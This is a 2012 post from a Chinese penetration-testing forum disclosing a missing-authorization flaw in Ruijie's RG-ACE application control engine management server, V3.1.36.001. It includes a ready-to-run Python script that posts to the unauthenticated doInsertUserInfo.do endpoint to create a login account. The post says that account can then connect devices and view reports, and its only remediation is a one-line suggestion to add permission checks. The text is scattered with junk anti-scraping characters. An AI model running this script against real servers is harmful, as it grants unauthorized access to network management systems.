找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2115|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
& S  j5 m4 L- w" N. M  K5 q0 @4 Z- Q* o/ F
( H8 \% t) u! w9 i) e
测试的具体版本是+ b! D9 C8 O6 U
产品名称: 锐捷应用控制引擎
! d7 G4 V4 X& c4 f3 C) k版本号: 3.1.36.001 TC5 k  E8 N5 e3 I" {" D' m1 ]
编译时间: 201104291730. I/ e! ^6 G! f- S5 j
0 V# S0 E' v% S( `7 p0 D
1 i; \" x1 R; ^6 e
漏洞证明:, k$ {2 ^( v, a7 ]1 p  f" C- p
. c0 c3 R( V) q! F* L0 F: m; \( c
' o  t+ i( j4 O, z3 ^8 p. N1 I

7 a8 E& U7 h, K) |. N
" Q# D& s- G$ V- h$ t4 n* o6 C9 {8 u1 W$ C! q

8 j7 L- [6 t; d执行脚本
; V" |* Y, ?+ Q9 s3 @" C#! /usr/bin/env python# O/ N' {3 i- C7 \1 S% t
#coding=gbk
# q% j& I- y: A) m3 S1 E; Q#RG-ACE管理服务器 V3.1.36.001- b" }3 |' q  d% `
import urllib2, urllib,cookielib/ ]( ]9 I6 X) C; ^2 v& b
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP. a3 e% ]' s6 o: W- D) J4 b; E) y
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
/ B# E. @- f* x6 sopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]- \* n. f; E1 Q  G% e9 w) T; |$ H1 s1 s
post=(("event","userManager.doInsertUserInfo"),
' b/ q2 I9 ?8 M9 q) h. ~("useractionname","addButtonValue"),
: n! R3 j) O- c("useropermanager","userManager"),1 W1 V; Z* Y2 C2 }  G* C5 `
("userName","t"), #######账号自己加
* F9 `# s: S! I' l0 U("pwd","aaaaaa"),######密码自己加
0 z8 ?7 u/ x5 ^' N5 l("trueName","ad"),
$ }% l+ o2 |$ P("email",""),. H/ Y1 V1 y) ?9 {2 G0 q
("mobilePhone",""),# N' A1 N, k0 K
("officePhone",""),
  [3 D5 x% D) `0 \("addr",""),! e4 t' n1 i3 }6 ]( f! P2 M
("submit","确定"))
, l+ R  D, z0 b$ J" U( x& G; x5 O& ^urllib2.install_opener(opener)
# F5 V6 ]& U/ p9 {* X6 X1 Ip=urllib2.urlopen(url, urllib.urlencode(post)).read()# L  z% a$ F' m
print "Done"0 f5 s# G. w5 h2 n

" v0 z4 g% G9 `& @1 m登录,连接设备' N( ?9 M8 [+ v, q* R! m' {

' ]4 X" t1 |0 d; u
" c* N! n& K6 I! d: ?
' G# Q2 a, x5 X$ {# k
: z( @, M& z2 X7 X, T7 _/ o# Y6 R: i, D6 ~' m. r% u: p/ V
默认的管理员admin权限更大点
2 j- z7 H; T: I
7 X% D) \4 r+ d; f( d5 p
+ D, d8 ~' Y% v( y1 g8 g
5 L" j4 E. B+ O  O. F& e. {   @3 _% w8 ]9 U$ r4 m
1 y  f7 c9 m8 J8 N( p% C
修复方案:
2 `: L; @8 R, D: ^; g! M7 N* J加强对接口的权限验证
) p# H  B$ Z/ Z
' e* j) T# t9 h, L2 I9 [
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表